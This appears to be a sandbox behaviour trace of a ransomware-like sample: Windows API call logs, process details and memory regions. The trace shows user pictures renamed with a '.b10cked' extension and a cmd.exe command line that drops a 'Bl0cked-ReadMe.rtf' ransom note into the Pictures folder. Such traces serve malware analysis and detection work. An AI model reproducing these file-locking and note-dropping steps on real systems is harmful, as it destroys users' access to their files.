lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.560] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.560] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.560] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.560] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.560] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.560] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.560] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.560] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.560] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.560] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.560] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.560] GetEnvironmentStringsW () returned 0x3322c8* [0141.560] FreeEnvironmentStringsW (penv=0x3322c8) returned 1 [0141.560] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.560] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.560] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.560] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.560] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.560] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.560] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.560] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.560] _wcsicmp 
(_String1="KEYS", _String2="RANDOM") returned -7 [0141.560] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.560] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f9f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.560] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f9f8, lpFilePart=0x22f9f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f9f4*="Desktop") returned 0x18 [0141.560] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.561] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f774 | out: lpFindFileData=0x22f774) returned 0x330008 [0141.561] FindClose (in: hFindFile=0x330008 | out: hFindFile=0x330008) returned 1 [0141.561] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f774 | out: lpFindFileData=0x22f774) returned 0x330008 [0141.561] FindClose (in: hFindFile=0x330008 | out: hFindFile=0x330008) returned 1 [0141.561] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f774 | out: lpFindFileData=0x22f774) returned 0x330008 [0141.561] FindClose (in: hFindFile=0x330008 | out: hFindFile=0x330008) returned 1 [0141.561] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.561] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.561] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.561] GetEnvironmentStringsW () returned 0x332ae8* [0141.561] FreeEnvironmentStringsW (penv=0x332ae8) returned 1 [0141.561] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.562] GetConsoleOutputCP () returned 0x1b5 [0141.562] GetCPInfo (in: CodePage=0x1b5, 
lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.562] GetUserDefaultLCID () returned 0x409 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fb38, cchData=128 | out: lpLCData="0") returned 2 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fb38, cchData=128 | out: lpLCData="0") returned 2 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fb38, cchData=128 | out: lpLCData="1") returned 2 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.563] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.563] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.564] GetConsoleTitleW (in: lpConsoleTitle=0x3208d8, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.564] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.564] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.564] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.564] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.564] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.565] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.565] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.565] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.565] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.565] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.565] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0141.567] GetConsoleTitleW (in: lpConsoleTitle=0x22f830, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.567] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.567] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.567] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.567] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.567] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.567] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.567] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.567] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.567] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.567] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.567] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.567] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.568] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.568] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.568] _wcsicmp 
(_String1="move", _String2="PROMPT") returned -3 [0141.568] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.568] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.568] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.568] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.568] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.568] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.568] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.568] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.568] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.568] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.568] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.568] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.568] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.568] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.568] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.568] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.568] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.568] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.568] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.568] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.569] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.569] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.569] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f5ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f5e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f5e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", 
_MaxCount=0x7) returned 38 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 
[0141.570] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.570] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.571] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.571] _wcsicmp (_String1="AR0_1P~1.JPG", _String2=".") returned 51 [0141.571] _wcsicmp (_String1="AR0_1P~1.JPG", _String2="..") returned 51 [0141.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1p~1.jpg")) returned 0x20 [0141.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.571] SetErrorMode (uMode=0x0) returned 0x0 [0141.571] SetErrorMode (uMode=0x1) returned 0x0 [0141.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", nBufferLength=0x104, lpBuffer=0x22ef74, lpFilePart=0x22ef5c | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", lpFilePart=0x22ef5c*="AR0_1P~1.JPG") returned 0x26 [0141.571] SetErrorMode (uMode=0x0) returned 0x1 [0141.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x11 [0141.571] _wcsicmp (_String1="AR0_1P~1.JPG", _String2=".") returned 51 [0141.571] _wcsicmp (_String1="AR0_1P~1.JPG", 
_String2="..") returned 51 [0141.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1p~1.jpg")) returned 0x20 [0141.571] SetErrorMode (uMode=0x0) returned 0x0 [0141.571] SetErrorMode (uMode=0x1) returned 0x0 [0141.572] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", nBufferLength=0x104, lpBuffer=0x22f3f0, lpFilePart=0x22f188 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", lpFilePart=0x22f188*="AR0_1P~1.JPG") returned 0x26 [0141.572] SetErrorMode (uMode=0x0) returned 0x1 [0141.572] SetErrorMode (uMode=0x0) returned 0x0 [0141.572] SetErrorMode (uMode=0x1) returned 0x0 [0141.572] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x22f5f8, lpFilePart=0x22f188 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked", lpFilePart=0x22f188*="aR0_1pZCSZwjfY.jpg.b10cked") returned 0x34 [0141.572] SetErrorMode (uMode=0x0) returned 0x1 [0141.572] SetLastError (dwErrCode=0x0) [0141.572] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1pzcszwjfy.jpg.b10cked")) returned 0xffffffff [0141.572] GetLastError () returned 0x2 [0141.572] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x22eb04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb04) returned 0x320f20 [0141.572] FindNextFileW (in: hFindFile=0x320f20, lpFindFileData=0x22eb04 | out: lpFindFileData=0x22eb04) returned 0 [0141.572] GetLastError () returned 0x12 [0141.572] FindClose (in: hFindFile=0x320f20 | out: hFindFile=0x320f20) returned 1 [0141.573] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x331af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | 
out: lpFindFileData=0x331af0) returned 0x320f20 [0141.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x22ed9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked", lpFilePart=0x0) returned 0x34 [0141.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg", nBufferLength=0x104, lpBuffer=0x22ed9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg", lpFilePart=0x0) returned 0x2c [0141.573] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1pzcszwjfy.jpg")) returned 0x20 [0141.573] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1pzcszwjfy.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1pzcszwjfy.jpg.b10cked"), dwFlags=0x3) returned 1 [0141.574] FindClose (in: hFindFile=0x320f20 | out: hFindFile=0x320f20) returned 1 [0141.574] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22ed50 | out: _Buffer=" 1") returned 9 [0141.574] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.574] GetFileType (hFile=0x7) returned 0x2 [0142.172] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.172] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ecdc | out: lpMode=0x22ecdc) returned 1 [0142.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.172] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22ed10 | out: lpConsoleScreenBufferInfo=0x22ed10) returned 1 [0142.172] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.173] FormatMessageW (in: 
dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22ed50 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.173] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22ed34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22ed34*=0x1a) returned 1 [0142.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.173] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.174] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.174] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.174] SetConsoleInputExeNameW () returned 0x1 [0142.174] GetConsoleOutputCP () returned 0x1b5 [0142.174] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.174] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.175] exit (_Code=0) Process: id = "180" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ea0" os_pid = "0xfa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM 
Authentication" [0x7] Region: id = 15140 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15141 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15142 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15143 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15144 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15145 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15146 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15147 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15148 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 15149 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16070 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16071 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16072 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16073 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 16074 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 16075 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16076 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16077 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16078 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16079 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16080 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16081 start_va = 
0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16082 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16083 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16084 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16085 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16086 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16087 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 16088 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 16089 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16090 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16091 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 16092 start_va = 0x4f0000 end_va = 0x652fff 
